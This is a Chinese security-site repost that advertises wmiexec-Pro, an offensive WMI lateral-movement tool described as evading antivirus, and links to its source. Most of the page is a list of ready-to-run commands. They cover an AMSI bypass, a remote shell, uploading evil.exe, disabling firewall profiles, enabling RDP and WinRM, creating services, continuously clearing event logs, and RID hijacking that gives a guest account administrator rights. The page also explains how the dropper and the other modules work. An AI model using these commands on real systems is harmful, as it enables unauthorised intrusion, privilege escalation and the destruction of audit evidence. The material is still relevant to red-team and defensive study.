新一代wmiexec免杀横向工具

admin
admin
admin
137989
文章
113
评论
2025年1月8日08:27:42评论22 views字数 6635阅读22分7秒阅读模式

项目介绍

新一代wmiexec.py且具备更多新特性,整个操作只与端口135(不需要smb连接)一起工作,用于横向移动中的AV闪避(Windows Defender,火绒,360)

项目特点

  • 主要功能:AV闪避
  • 主要特性:不需要win32_process
  • 主要特点:只需要135端口。
  • 新模块:AMSI旁路
  • 新模块:文件传输
  • 新模块:通过wmi类方法远程启用RDP
  • 新模块:Windows防火墙滥用
  • 新模块:事件日志循环清理
  • 新模块:远程启用WinRM,无需触摸CMD
  • 新模块:服务经理
  • 新模块:RID-劫持
  • 增强:以新的方式获得命令执行输出
  • 增强功能:执行vbs文件

项目使用

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -hBasic enumeration:   python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -runEnable/disable amsi bypass:   python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable   python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disableExecute command:   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save   python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)Filetransfer:   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:windowstempevil.exe" (Upload file over 512KB)   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:windowstempevil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)   python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)RDP:   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)WinRM (Only support win7+):   python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable   python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disableFirewall (Only support win8+):   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)   python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)Services:   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:windowssystem32calc.exe'   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:windowssystem32calc.exe' -class "Win32_TerminalService" (Create service via alternative class)   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"   python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.jsonEventlog:   python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog)   python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping cleaning eventlog)RID Hijack:   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable   python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)   python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)   python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)

帮助信息:

新一代wmiexec免杀横向工具

命令执行:

新一代wmiexec免杀横向工具

文件传输:

新一代wmiexec免杀横向工具

新一代wmiexec免杀横向工具

工作机制

  • AMSI模块:来自黑帽亚洲2018的Tal-Liberman的技术
  • 执行命令模块:以前项目的增强:wmiexec-RegOut,从wmi类而不是从注册表中获取输出
  • 文件传输模块:对于上传:将源文件以base64字符串的形式编码到名为WriteFile.vbs的滴管中,然后创建一个新的ActiveScriptEventConsumer对象实例来执行该滴管。
  • 下载:remote创建一个存储数据的类,然后执行编码器LocalFileIntoClass.vbs对文件进行编码,并将数据存储到刚刚创建的类中。
  • rdp模块:对于启用/禁用:rdp服务:直接控制TerminalServices对象。
  • 对于启用/禁用:受限管理模式:通过StdRegProv类控制注册表项DisableRestrictedAdmin。
  • winrm模块:启用/禁用:调用服务模块
  • 对于防火墙规则:使用firewall.py模块配置winrm的防火墙。
  • 防火墙模块:滥用MSFT _网络协议端口过滤器,MSFT _网络防火墙规则,MSFT _网络防火墙配置文件类。
  • 服务模块:滥用Win32_Service类。
  • 事件日志模块:执行vbs脚本文件ClearEventlog.vbs,而不删除事件和使用者。
  • 执行-vbs模块:选自wmipersist.py。
  • classMethodEx方法:对于创建类:执行vbs scritp : CreateClass.vbs来创建简单的类。(为什么?不知道如何在impacket中使用PutClass方法。)
  • 对于移除类:调用DeleteClass方法来移除类

下载地址

https://github.com/XiaoliChan/wmiexec-Pro

 

原文始发于微信公众号(七芒星实验室):【神兵利器】新一代wmiexec免杀横向工具

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月8日08:27:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新一代wmiexec免杀横向工具http://cn-sec.com/archives/3604129.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息